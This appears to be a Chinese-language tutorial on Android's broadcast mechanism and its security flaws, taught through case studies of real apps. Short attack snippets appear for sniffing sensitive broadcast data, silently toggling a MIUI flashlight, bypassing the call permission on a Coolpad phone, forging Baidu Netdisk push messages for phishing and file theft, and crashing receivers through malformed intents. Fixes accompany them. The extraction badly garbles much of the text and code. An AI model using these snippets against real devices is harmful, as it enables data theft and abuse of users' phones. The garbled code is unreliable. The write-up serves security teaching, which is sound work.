1广播机制简介

Android中的每个应用程序都可以对自己感兴趣的广播进行注册这样该程序只会收到自己所关心的广播内容这些广播可以是来自系统的也可能是来自其他程序的。

Android提供了一套完整的API,允许应用程序自由地发送和接收广播。

广播机制分为两个方面广播发送者和广播接收者一般来说BroadcastReceiver就是广播接收者。

2广播机制应用场景

Android的广播机制使用了设计模式中的观察者模式基于消息的发布/订阅事件模型从设计模式上讲广播的发送者和接收者极大程度的解耦使得系统方便集成容易扩展。

1消息订阅者广播接收者

1首先开发人员自定义广播接收者BroadcastReceiver并重写onRecvice()方法在里面可以实现具体操作然后到消息中心AMS注册

2广播发送者定义并向AMS发送广播

3AMS查找符合相应条件IntentFilter/Permission等的BroadcastReceiver

4AMS将广播发送到上述符合条件的BroadcastReceiver相应的消息循环队列中

5BroadcastReceiver通过消息循环执行拿到此广播回调BroadcastReceiver中的onReceive()方法。

继承BroadcastReceivre类

其他组件之间的交互如发送Notification、启动Service等默认情况下广播接收器运行在

线程因此onReceive()方法不能执行耗时操作否则将导致ANR

2广播接收者注册

//此broadcastReceiver能否接收其他App的发出的广播

//默认值是由receiver中有无intent-filter决定的如果有intent-filter默认值为true否则为falseandroid:exported[true

resource

//继承BroadcastReceiver子类的类名android:name.mBroadcastReceiver

//具有相应权限的广播发送者发送的广播才能被此BroadcastReceiver所接收android:permissionstring

//注Android四大基本组件都可以通过此属性指定自己的独立进程android:processstring

//本示例中给出的是用于接收网络状态改变时发出的广播intent-filter

action

android:nameandroid.net.conn.CONNECTIVITY_CHANGE

//intent-filter

receiver//此广播接收者类是mBroadcastReceiverandroid:name.mBroadcastReceiver

//用于接收网络状态改变时发出的广播intent-filteraction

android:nameandroid.net.conn.CONNECTIVITY_CHANGE

//intent-filter

/receiver我们完成静态注册后当App首次启动时系统会自动实例化mBroadcastReceiver类并注册到系统中

动态注册

1实例化自定义的广播接收者我们实现广播的功能可以继承BroadcastReceiver类并重写类中的方法

3使用Context的registerReceiver(BroadcastReceiver,IntentFilter)方法注册广播

4在onDestory()方法中通过调用unregisterReceiver()方法来实现取消注册

注意事项

注意动态广播最好在Activity的onResume()注册、onPause()注销

onCreate()

在onResume()注册、onPause()注销是因为onPause()在App死亡前一定会被执行从而保证广播在App死亡前一定会被注销从而防止内存泄露。

1不在onCreate()

onStop()注册、注销是因为当系统因为内存不足优先级更高的应用需要内存请看上图红框要回收Activity占用的资源时Activity在执行完onPause()方法后就会被销毁有些生命周期方法onStop()onDestory()就不会执行。

当再回到此Activity时是从onCreate方法开始执行。

2假设我们将广播的注销放在onStop()onDestory()方法里的话有可能在Activity被销毁后还未执行onStop()onDestory()方法即广播仍还未注销从而导致内存泄露。

3但是onPause()一定会被执行从而保证了广播在App死亡前一定会被注销从而防止内存泄露。

3广播发送者定义和发送广播

将此广播的“意图Intent”通过sendBroadcast方法发送出去

第一种分类

标准广播一种完全异步执行的广播广播发出之后所有的广播接收器都会在同一时刻接收这条广播信息广播效率比较高同时是无法截断的。

有序广播是一种同步执行的广播在广播发出之后同一时刻会有一个广播接收器能收到这条广播消息当这个广播接收器中逻辑执行完毕后广播才会继续传递。

第二种分类

//对应BroadcastReceiver中intentFilter的action

intent.setAction(BROADCAST_ACTION);

//发送广播

若被注册了的广播接收者中注册时intentFilter的action与上述匹配则会接收此广播即进行回调onReceive(),如下mBroadcastReceiver则会接收上述广播receiver//此广播接收者类是mBroadcastReceiverandroid:name.mBroadcastReceiver

//用于接收网络状态改变时发出的广播intent-filteraction

//intent-filter

/receiver如果发送的广播有对应权限那么广播接收者也需要对应权限

系统广播

Android中内置了多个系统广播只要涉及到手机的基本操作如开机、网络状态变化、拍照等都会发送相应的广播每个广播都有特定的Intent-Filter(包括具体的action)Android系统广播action如下

系统操作

android.net.conn.CONNECTIVITY_CHANGE

关闭或打开飞行模式

Intent.ACTION_AIRPLANE_MODE_CHANGED

充电时或电量发生变化

Intent.ACTION_CLOSE_SYSTEM_DIALOGS

Intent.ACTION_CONFIGURATION_CHANGED

插入耳机时

未正确移除SD卡但已取出来时(正确移除方法:设置–SD卡和设备内存–卸载SD卡)

Intent.ACTION_MEDIA_BAD_REMOVAL

插入外部储存装置如SD卡

注当使用系统广播是只需要在注册广播接收者时定义相关的action即可并不需要手动发送广播当系统有相关操作时会自动进行系统广播

有序广播

有序是针对广播接收者而言的。

广播接收者接收广播的顺序规则同时面向静态和动态注册的广播接收者

1按照Priority属性值从大-小排序

2先接收的广播接收者可以对广播进行截断即后接收的广播接收者不在接收此广播可以使用abortBroadcast()方法

3先接收的广播接收者可以对广播进行修改那么后接收的广播接收者将接收到被修改后的广播

具体使用有序广播的使用过程与普通广播非常类似差异仅在于广播的发送方式

sendOrderedBroadcast(intent,null);

参数2与权限相关字符串一般为null

由于Android中的广播可以跨App直接通信exported对于有intent-filter情况下默认值为true

1其他App针对性发出与当前App

intent-filter相匹配的广播由此导致当前App不断接收广播并处理

2其他App注册与当前App一致的intent-filter用于接收广播获取广播的具体星系会出现安全性和效率性问题

解决方案

(1)App应用内广播壳理解为一种局部广播广播的发送者和接收者都同属于一个App

(2)相比于全局广播普通广播App应用内广播优势体现在安全性高和效率高

实现步骤

1注册广播是将exported属性设置为false使得非本App内部发出的此广播不被接收

2在广播的发送和接收时增设相应权限permission用于权限验证

3发送广播时指定该广播接收器所在的包名此广播将只会发送到此包中的App内与之相匹配的有效广播接收器中

通过intent.setPackage(packageName)指定包名

方法2

使用封装好的LocalBroadcastManager类使用方式上与全局广播几乎相同只是注册/取消注册广播接收器和发送广播时将参数context变成LocalBroadcastManager的单一实例。

注意对于LocalBroadcastManager方式发送的应用内广播只能通过LocalBroadcastManager动态注册不能静态注册

//注册应用内广播接收器

IntentFilter();//步骤2实例化LocalBroadcastManager的实例

LocalBroadcastManager.getInstance(this);//步骤3设置接收广播的类型

intentFilter.addAction(android.net.conn.CONNECTIVITY_CHANGE);//步骤4调用LocalBroadcastManager单一实例的registerReceiver方法进行动态注册

localBroadcastManager.registerReceiver(mBroadcastReceiver,

localBroadcastManager.unregisterReceiver(mBroadcastReceiver);//发送应用内广播

Intent

intent.setAction(BROADCAST_ACTION);

localBroadcastManager.sendBroadcast(intent);这里我们就完成了开发人员手动完成部分就成功实现了Android的广播机制后续就是系统自动完成了

最后我们关注一些不同注册方式的广播接收器回调onReceive()中的context返回值:

对于静态注册全局应用内广播回调onReceive(context,intent)中的context返回值是ReceiverRestrictedContext

对于全局广播的动态注册回调onReceive(context,

Context

对于应用内广播的动态注册LocalBroadcastManager方式回调onReceive(context,

intent)中的context返回值是Application

Context

对于应用内广播的动态注册非LocalBroadcastManager方式回调onReceive(context,

Context

BroadcastReceiver是四大组件之一这个组件涉及广播发送者和广播接收者这里的广播实际上指的是intent当发送一个广播是系统会将发送的广播(intent)与系统中所有注册的符合条件的接IntentFilter进行匹配匹配成功则执行相应的onReceive函数

发送广播时如果处理不当恶意应用便可以嗅探拦截广播致使敏感数据泄露接收广播时处理不当便会导致拒绝服务攻击、伪造消息、越权操作等

1.敏感信息泄漏漏洞

发送的intent没有明确指定接收者而是简单的通过action进行匹配恶意应用便可以注册一个广播接收者嗅探拦截到这个广播如果这个广播存在敏感数据就被恶意应用窃取了。

2漏洞复现

Intent();v1.setAction(com.sample.action.server_running);v1.putExtra(local_ip,v0.h);v1.putExtra(port,v0.i);v1.putExtra(code,v0.g);v1.putExtra(connected,v0.s);v1.putExtra(pwd_predefined,v0.r);if(!TextUtils.isEmpty(v0.t)){v1.putExtra(connected_usr,v0.t);}sendBroadcast(v1);

}通过分析得出该程序通过intent隐式传递并通过action匹配发送一个广播这样系统内其他程序都可以接收到这个广播然后在广播接收者中编写接收代码这样我们可以编写攻击代码获取敏感数据信息

public

null;if(intent.getAction().equals(com.sample.action.server_running)){String

pwdintent.getStringExtra(connected);sAirdroid

[pwd]/intent.getExtras();}Toast.makeTest(context,String.format(%sReceived,s),Toast.LENGTH_SHORT).show();

我们尝试采用本地广播的方式这样程序发出的广播就只能被app自身广播接收器接收

Intent

LocalBroadcastManager.getInstance(this).sendBroadcast(intent);案例2Android

RSSI

Android操作系统会定期在系统范围内广播WiFI强度值RSSI,RSSI值表示设备接收到的信号的相对强度更高更强但与实际物理强度dBm没有直接关系这是通过两个独立的intents实现的Android

9之前是android.net.wifi.STATE_CHANGE其他安卓设备是android.net.wifi.RSSI_CHANGED

当应用通过WifiManager访问信息时正常就在应用manifest中请求ACCESS_WIFI_STATE权限。

因为WiFi

9中新引入的也是用于位置定位的需要ACCESS_FINE_LOCATION权限。

但监听系统广播时

1RSSI值是通过广播获取的绕过的正常的权限检查ACCESS_WIFI_STATE

2通过广播或WiFimanager获取的RSSI值可以在不需要其他位置权限的情况下进行室内定制

攻击代码

filter.addAction(android.net.wifi.STATE_CHANGE);filter.addAction(android.net.wifi.RSSI_CHANGED);registerReceiver(receiver,

filter);

可以通过两种方式注册广播接收器一种是在AndroidManifest.xml文件中通过标签静态注册另一种是通过Context.registerReceiver()动态注册指定相应的intentFilter参数动态注册的广播默认都是导出的如果导出的BroadcastReceiver没有做权限控制导致BroadcastReceiver组件可以接收一个外部可控的url、或者其他命令导致攻击者可以越权利用应用的一些特定功能比如发送恶意广播、伪造消息、任意应用下载安装、打开钓鱼网站等

2漏洞复现

MIUI内置的手电筒软件Stk.apk中TorchService服务没有对广播来源进行验证导致任何程序可以调用这个服务打开或关闭手电筒利用这个漏洞可以导致系统电源迅速消耗

漏洞攻击代码

intent.setAction(net.cactii.flash2.TOGGLE_FLASHLIGHT);

sendBroadcast(intent);我们这里就是通过intent隐私传递发送广播然后匹配小米应用中的action这样就可以打开或广播手电筒从而利用这个漏洞导致系统电源迅速消耗

三种方法

在AndroidManifest.xml中将TorchService申明为exportfalse的在AndroidManifest.xml中申明一个私有权限级别为signature并为TorchService申明需要这个权限在TorchService的实现代码中检查Intent的来源是否Stk.apk自身。

漏洞详情

酷派最安全手机s6拨打电话权限绕过第三方app可以无需拨打电话权限直接拨打电话

攻击代码

ComponentName(com.android.phone,com.android.phone.PhoneGlobals$NotificationBroadcastReceiver));

intent.setAction(com.android.phone.ACTION_CALL_BACK_FROM_NOTIFICATION);

intent.setData(Uri.parse(tel:10000));

intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);

sendBroadcast(intent);通过intent启动外部电话应用匹配action并授权标志位这样就可以不用获取权限就可以打电话

1使用本地广播

2对广播的action进行判别案例3酷派最安全手机s6程序锁绕过

漏洞详情

程序加锁解锁是靠广播来控制的并且这两条广播没做权限限制任意应用可以发送此广播达到恶意解锁、恶意锁定应用的目的

漏洞测试

android.intent.action.PACKAGE_FULLY_REMOVED

package:com.wumii.android.mimi就可以成功解锁

推荐使用呢LocalBroadcastManager类,这个类相较于Context.sendBroadcast(intent)有下面三方面的优势

1.不用担心敏感数据泄露通过这种方式发送的广播只能应用内接收。

3.消息伪造

暴露的Receiver对外接收Intent如果构造恶意的消息放在Intent中传输被调用的Receiver接收可能产生安全隐患

2漏洞复现

百度云盘手机版存在高危漏洞恶意攻击者通过该漏洞可以对手机用户进行钓鱼欺骗盗取用户隐私文件和信息以百度云盘APP权限执行任何代码。

百度云盘有一个广播接收器没有对消息进行安全验证通过发送恶意的消息攻击者可以在用户手机通知栏上推送任意消息点击消息后可以利用webview组件盗取本地隐私文件和执行任意代码。

存在漏洞的组件是com.baidu.android.pushservice.action.MESSAGE

攻击代码

Intent();i.setAction(com.baidu.android.pushservice.action.MESSAGE)Bundle

new

JSONObject();jsobject.put(title,

百度云盘【漏洞你中奖了】);jsobject.put(description,

http://bcscdn.baidu.com/netdisk/BaiduYun_5.1.0.apk);jsobject.put(url,

http://drops.wooyun.org/webview.html);JSONObject

customcontent_js

1);customcontent_js.put(msg_type,

resources_push);customcontent_js.put(uk,

1);customcontent_js.put(shareId,

1);

jsobject.toString();b.putByteArray(message,

catch

android:protectionLevelsignature

receiver

android:namecom.umeng.message.UmengMessageBootReceiver

android:protectionLevelsignatureintent-filteraction

android:nameandroid.intent.action.BOOT_COMPLETED//intent-filter

/receiver4.拒绝服务

如果敏感的BroadcastReceiver没有设置相应的权限保护很容易受到攻击。

最常见的是拒绝服务攻击。

拒绝服务攻击指的是传递恶意畸形的intent数据给广播接收器广播接收器无法处理异常导致crash。

拒绝服务攻击的危害视具体业务场景而定比如一个安全防护产品的拒绝服务、锁屏应用的拒绝服务、支付进程的拒绝服务等危害就是巨大的。

2漏洞复现

恶意软件发送一个消息就可以轻松让QQ手机管家拒绝服务安全防护完全失灵。

com.tencent.qqpimsecure.service.InOutCallReceiver这个广播组件没有对消息进行校验导致空消息造成null

point问题直接crash.

com.tencent.qqpimsecure.service.InOutCallReceiver);

sendBroadcast(i);案例2fourgoats.apk拒绝服务攻击崩溃

run

image-20210912155436267我们根据组件的类名找对对应的源码信息发现需要两个参数

phoneNumber、message

lisi在此之前我们在AndroidManifest.xml文件里面获取广播名

我们发送恶意广播

org.owasp.goatdroid.fourgoats.SOCIAL_SMS

--extra

if(i.getAction().equals(“serializable_action”)){i.getSerializableExtra(serializable_key);//未做异常判断

//Parcelable:

this.b(RouterConfig)this.getIntent().getParcelableExtra(“filed_router_config”);//引发转型异常崩溃

拒绝服务攻击可以参考Activity的拒绝服务攻击和Service的拒绝服务攻击。

四、Broadcast

1私有广播接收器设置exported’false’,并且不配置intent-filter。

(私有广播接收器依然能接收到同UID的广播)。

3内部app之间的广播使用protectionLevel’signature’

5发送的广播包含敏感信息时需指定广播接收器使用显示意图或者setPackage(String

五、实验总结

本文主要介绍了Android中广播机制的运行原理并对Android广播机制中的常见漏洞做了一个初步的总结我们可以发现Android的四大组件的漏洞原理基本存在很大的相关性在拒绝服务攻击中这里用了一个简易的样本并逐步实现了拒绝服务攻击的步骤本文可能还存在很多不足后续逐步完善也欢迎各位大佬指正。

github首页github

https://www.jianshu.com/p/ca3d87a4cdf3

https://blog.csdn.net/q376794191/article/details/85292952

https://www.cnblogs.com/lwbqqyumidi/p/4168017.html

https://www.jianshu.com/p/c1a826a5beea

https://www.jianshu.com/p/e236a2669797

https://www.jianshu.com/p/e236a2669797

https://wwws.nightwatchcybersecurity.com/2018/11/11/cve-2018-9581/

https://tea9.xyz/post/962818054.html

https://paper.seebug.org/papers/Archive/drops2/Android%20Broadcast%20Security.html